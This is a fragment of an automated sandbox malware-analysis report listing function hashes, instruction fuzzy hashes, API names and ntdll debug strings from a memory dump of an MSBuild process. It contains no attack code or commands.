                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: 74a6280c94be676a5b1d1d8f26d88a6578f832f54bb713cacc95254319b683ea
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: FBF0AFB2600625ABD328CF4DD840E67FBEADBD1A84F048129A515DB220EA31DD04CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: 00ee3b3d70b1860273652ae4525646b538afe38fb8eb5570914799ad1ef27cf7
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: 1CF0CD339185329BD73F16594440B67F7558FE5A64F160275E2055F180CFE4CD015AD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ff1043684f7583a34fa980e3f516054c33c339a1eb735b692fed3027dccbe2c
                                                                                                              • Instruction ID: 9c31c4d90243ba6331f760fc7fb2bf1a4f65fcb19f3d1d179acf432594589237
                                                                                                              • Opcode Fuzzy Hash: 0ff1043684f7583a34fa980e3f516054c33c339a1eb735b692fed3027dccbe2c
                                                                                                              • Instruction Fuzzy Hash: 56017C71E10209EBCB08DFA9E444AAEB7F8FF58304F50402AE914E7351D7349A00CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17bb23f6e8aeb4a68dfe398a89ec409ac9dbc27b1558e88988e2d6f201475cc7
                                                                                                              • Instruction ID: 2a3bf4506e728d758f1e936a6a2cf4df928b5086b52ce7794cb695372ae5572b
                                                                                                              • Opcode Fuzzy Hash: 17bb23f6e8aeb4a68dfe398a89ec409ac9dbc27b1558e88988e2d6f201475cc7
                                                                                                              • Instruction Fuzzy Hash: DA017C71A1020AEBCB08DFA9D445AAEB7F8EF58304F50402AF910E7351D774AA00CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: 2cc050492517fcfaebb3343713875ac5f39f5f84e6eb5cef594ba56bcb7b2aa4
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: 02E0D872244545ABD32D5E598800B66B7A6DBD0FA0F260439E2028B950DF70DC40C7D9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d84bf788fc41189e14413f9c78cab47947691743a686046a386a2e311ca5d38f
                                                                                                              • Instruction ID: 2d2beb6f19d42e99f5918bbe065902bdca80acb8b3e806ceb1a905e6efdd46d1
                                                                                                              • Opcode Fuzzy Hash: d84bf788fc41189e14413f9c78cab47947691743a686046a386a2e311ca5d38f
                                                                                                              • Instruction Fuzzy Hash: C2F0E535A25DA14FEB7AD7ACE148B5177E0AB50674F0E0554D400C7D12C334FC80C650
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 2b9f1c9433328a8b3225ad655b2bfed702e66239fa9805277c3c771f4e2792d3
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: E6E0DF73A00520BBDB2997998D41FDABFACDBA0EA4F150064F600E7094E630DE00C690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction ID: c16ce1e6d943164a5ab7e56a7ae6a4c747fa3c6e9ba9b15e23b92406d17d2975
                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction Fuzzy Hash: 61E09B31B40B559BCB298A9DC144E53BBE8DF99664F15806DEA0547612C371F882C6D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 7CC012322A0648AFC716AE99CD01F027BA9EBACB50F000022F2048B670C635E821EA84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: c887acd6cc7b9378af60930eb8cacb3fd45123eedcb3b6912c40b39870493e9b
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 81D01236100248EFCB05DF45C890D9A776AFBD8710F108019FD19077108B31ED62DA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 2be73dc913ba6efa185504d2621d38c23c5d86030fc09917750c9bcdb8851c32
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: 05C04C797115458FCF19DB19D294F4977E4F744754F554890E805CB726E724E811CA10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e55826096a860d0451678575cadaa51647d8c7cf9fb705641c3031003bf8495d
                                                                                                              • Instruction ID: 92c08792385d6606538c9ecd09df0ae8baf9cf6707b172cbed1785025db76160
                                                                                                              • Opcode Fuzzy Hash: e55826096a860d0451678575cadaa51647d8c7cf9fb705641c3031003bf8495d
                                                                                                              • Instruction Fuzzy Hash: 2C9002716059001291447158498454A4009A7E0301B55C011E4425554CCB158A665361
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 507bf84aa05c2a3af2d7a7bdccb56af74345c8cdc1330a53936d8385c073dae1
                                                                                                              • Instruction ID: 37530e721cccc9e516a7d33fffa01b138595e4681195c92690da2ce97c07ed8d
                                                                                                              • Opcode Fuzzy Hash: 507bf84aa05c2a3af2d7a7bdccb56af74345c8cdc1330a53936d8385c073dae1
                                                                                                              • Instruction Fuzzy Hash: AE9002A16016004241447158490440A6009A7E1301395C115A4555560CC71989659369
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 413dfc0e2779e06700d30dcc74979bbff315abd7917e676e01fc3a89f7020127
                                                                                                              • Instruction ID: ff22fbf924ed3328a94445068b589356d82f2651107a383817ff2a024f43bf6a
                                                                                                              • Opcode Fuzzy Hash: 413dfc0e2779e06700d30dcc74979bbff315abd7917e676e01fc3a89f7020127
                                                                                                              • Instruction Fuzzy Hash: 0790027120150802D1087158490468A000997D0301F55C011AA025655ED76689A17231
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 543bc13322e4a311ea0ef5f1604fdcccca63e862db86f319cc41773074d905f0
                                                                                                              • Instruction ID: af5edcec478ddaae847f07f175549355425201b14bbd45d51baac62a417fa0b7
                                                                                                              • Opcode Fuzzy Hash: 543bc13322e4a311ea0ef5f1604fdcccca63e862db86f319cc41773074d905f0
                                                                                                              • Instruction Fuzzy Hash: D190027160550802D1547158451474A000997D0301F55C011A4025654DC7568B6577A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db788e6666059082c519ba7a33846708609c823443010d6fa065b605aaf856fd
                                                                                                              • Instruction ID: 4885f2e8ff052a71de07e8439c21f405f82ec21eefdaaf047fb025a9360e37cc
                                                                                                              • Opcode Fuzzy Hash: db788e6666059082c519ba7a33846708609c823443010d6fa065b605aaf856fd
                                                                                                              • Instruction Fuzzy Hash: 6890027120150802D1847158450464E000997D1301F95C015A4026654DCB168B6977A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b10931faed86225c7c07a7ec0386d77eabb9a7651da588ff27311fdd4d926efe
                                                                                                              • Instruction ID: 0b3c9430f522c7d3db4d0776a6b33b99dbaeff0715cfba32faf9f8d3c17671ed
                                                                                                              • Opcode Fuzzy Hash: b10931faed86225c7c07a7ec0386d77eabb9a7651da588ff27311fdd4d926efe
                                                                                                              • Instruction Fuzzy Hash: 7F90027120554842D14471584504A4A001997D0305F55C011A4065694DD7268E65B761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd46f6ec8684eb8a822ba97573cbc0db80b1a914f274b5ba8c266da19cda8bef
                                                                                                              • Instruction ID: 1b5159e1896cd99c77bba3f3307aa9ae3ecafdf711a1ec49edc9f8905d5a7129
                                                                                                              • Opcode Fuzzy Hash: dd46f6ec8684eb8a822ba97573cbc0db80b1a914f274b5ba8c266da19cda8bef
                                                                                                              • Instruction Fuzzy Hash: 9B9002E1201640924504B2588504B0E450997E0201B55C016E5055560CC62689619235
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6858df91d61c516688a0c7b116ed58c49edce2e8baf3291b7917b9aa737ca98a
                                                                                                              • Instruction ID: a5a2e1f6880cb7a99318d8c739d745d448771f07a797a6835b63ad42e02aea71
                                                                                                              • Opcode Fuzzy Hash: 6858df91d61c516688a0c7b116ed58c49edce2e8baf3291b7917b9aa737ca98a
                                                                                                              • Instruction Fuzzy Hash: 6F90047531150003010DF55C070450F004FD7D5351355C031F5017550CD733CD715331
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7633bf9301f048a90a7779e7f400ab7ca77642f26cc0e1d0db43e557e3c2e17
                                                                                                              • Instruction ID: 1e8a94a22e36161a4bd0006ba0c4872cecf9edb1b1a5153ecbd08690fd0d3373
                                                                                                              • Opcode Fuzzy Hash: d7633bf9301f048a90a7779e7f400ab7ca77642f26cc0e1d0db43e557e3c2e17
                                                                                                              • Instruction Fuzzy Hash: 38900265221500020149B558070450F0449A7D6351395C015F5417590CC72289755321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e6687b8c0a8c69f9c1415c401d40f9dbc1a8b186d9c7c2a68eeba5fb52a5fd5
                                                                                                              • Instruction ID: 55f33203e88252cb18534c3618ee2b1f7d834b744ad5161ff3206b0dedb7521e
                                                                                                              • Opcode Fuzzy Hash: 8e6687b8c0a8c69f9c1415c401d40f9dbc1a8b186d9c7c2a68eeba5fb52a5fd5
                                                                                                              • Instruction Fuzzy Hash: 3290026921350002D1847158550860E000997D1202F95D415A4016558CCA1689795321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8eaa36c275afd554952a1f3906bb25aaebd88f5034522a820b47b1b29cc5e645
                                                                                                              • Instruction ID: a261f2c7ae6a712e24c0037132a7510654cdec105907a0ea3273f48109e7ffb7
                                                                                                              • Opcode Fuzzy Hash: 8eaa36c275afd554952a1f3906bb25aaebd88f5034522a820b47b1b29cc5e645
                                                                                                              • Instruction Fuzzy Hash: 0490026120554442D10475585508A0A000997D0205F55D011A5065595DC7368961A231
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0df8ae1879e38db33b5365ca3c908cf9462e7476186abfa2f7e00460a334f6d
                                                                                                              • Instruction ID: c51a72dec1685634668a4afe3404048e02342b9164dea6ae2b79268c45947e7b
                                                                                                              • Opcode Fuzzy Hash: a0df8ae1879e38db33b5365ca3c908cf9462e7476186abfa2f7e00460a334f6d
                                                                                                              • Instruction Fuzzy Hash: C090026130150003D1447158551860A4009E7E1301F55D011E4415554CDA1689665322
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              • Opcode Fuzzy Hash: 10482a05269f3be36e2de34cbfb580a8ecb2615f334e13a34e2f4cd9aa604ad6
                                                                                                              • Instruction Fuzzy Hash: 0690026124555102D154715C450461A4009B7E0201F55C021A4815594DC65689656321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: afe16934de6018057b1d5372fc211acbd1128b9bbf4c2ff362b436db503e29a3
                                                                                                              • Instruction ID: a190ea88a47aa0f0d61ed2ffcf02f67bd27ffa5a4799b0d9b4ae175dd97ccf3a
                                                                                                              • Opcode Fuzzy Hash: afe16934de6018057b1d5372fc211acbd1128b9bbf4c2ff362b436db503e29a3
                                                                                                              • Instruction Fuzzy Hash: 1C90027120250142954472585904A4E410997E1302B95D415A4016554CCA1589715321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 20a04954b0b1b8cef82c0cca22ee14ee811ddb64d44889c1d1549816bbb13303
                                                                                                              • Instruction ID: 5c8979d2ccb5a69ee405c57e4e1c0949f6deb4fd2743c0a02cc32f36964a4eae
                                                                                                              • Opcode Fuzzy Hash: 20a04954b0b1b8cef82c0cca22ee14ee811ddb64d44889c1d1549816bbb13303
                                                                                                              • Instruction Fuzzy Hash: A890027520150402D5147158590464A004A97D0301F55D411A4425558DC75589B1A221
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: 77062b74d4dc7a489741dfeced9d617147566824fc21923995049fbefe02ff05
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 28bab979eb9546fbb667d578e0686619cd40fe57a58f0fbb81bb939fdcbf73ea
                                                                                                              • Instruction ID: 7094e6baaaf31043c16ae7ba20fbf51b85c229c53f20d3cb6c6668e157cea3ee
                                                                                                              • Opcode Fuzzy Hash: 28bab979eb9546fbb667d578e0686619cd40fe57a58f0fbb81bb939fdcbf73ea
                                                                                                              • Instruction Fuzzy Hash: C751E6B6A04116EFCB59DB9C899097EFBF8BB08244714C12AF8B5D7641E374DE508BA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 80a269f427a4c4bebbae369fe4f876779ecf87d57512c94b96ed7ee988152f29
                                                                                                              • Instruction ID: 4962ffdfa3a5e950f48f101f6035ce07fdde549bf8fb735b49b081b968394f44
                                                                                                              • Opcode Fuzzy Hash: 80a269f427a4c4bebbae369fe4f876779ecf87d57512c94b96ed7ee988152f29
                                                                                                              • Instruction Fuzzy Hash: EF510775A00645AFCB39DF9CC8909BFFBF8EB68604B04845EE496D7681E7B4DA00C760
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01184725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01184742
                                                                                                              • Execute=1, xrefs: 01184713
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011846FC
                                                                                                              • ExecuteOptions, xrefs: 011846A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01184787
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01184655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 3260575790b8be8008eb001af478af58d49b1bde5f671be675b218a0d55ca96c
                                                                                                              • Instruction ID: 015e8402014db4257767a5bfd377175e3b3212813b58c56944d56ea466bf8a96
                                                                                                              • Opcode Fuzzy Hash: 3260575790b8be8008eb001af478af58d49b1bde5f671be675b218a0d55ca96c
                                                                                                              • Instruction Fuzzy Hash: 0A514B31A0021ABBFF2DEBA9EC99FAD77B9EF14704F040099D605AB1C1DB709A418F51
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: 8fdf0b5202b7dda7da6ae8ee1bbbe6158207376da38c583602b52ac17e136510
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: 7F819E70E09649DEEFAD8E6CC8917FEBBA3AF45320F184159DC71A72D1C73498408B69
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 473cfa402010828cb2889459e3d7ba88a1481c4ada55364fb6984e1aeaddc5b4
                                                                                                              • Instruction ID: e9094ccc965acb03d6966a6211f7b36799b40d426106aa1ab8b3ca6524e89431
                                                                                                              • Opcode Fuzzy Hash: 473cfa402010828cb2889459e3d7ba88a1481c4ada55364fb6984e1aeaddc5b4
                                                                                                              • Instruction Fuzzy Hash: 2A21777AE00119ABDB19DF79DC40AFEBBF8EFA4A44F04011AED15D3240E771D9018BA1
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 0118031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011802BD
